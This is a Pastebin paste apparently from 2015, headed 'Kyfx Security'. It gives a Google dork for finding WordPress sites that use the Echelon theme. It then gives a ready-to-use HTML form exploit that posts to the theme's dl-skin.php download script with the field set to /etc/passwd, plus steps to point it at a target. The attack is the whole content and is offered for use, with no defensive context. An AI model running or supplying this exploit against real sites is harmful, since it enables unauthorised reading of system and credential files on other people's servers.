Advertisement
Kyfx

Wordpress Theme Echelon Arbitrary File Crunchy

Mar 29th, 2015
418
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. Kyfx Security
  2. Wp cgi crunchy lol
  3.  
  4. ==========================
  5. # Google Dork : inurl:/wp-content/themes/echelon
  6. /wp-content/themes/
  7. any wp dorks
  8. =========================
  9.  
  10. Exploit:
  11.  
  12. <html>
  13. <body>
  14. <form action="http://127.0.0.1/wp-content/themes/echelon/lib/scripts/dl-skin.php" method="POST">
  15. <b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
  16. <input type="submit" value=Download>
  17. </form>
  18. </body>
  19.  
  20.  
  21. save in html then press chrome to start the html and got to edit 127.0.0.1 the url target
  22.  
  23. Press Download
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement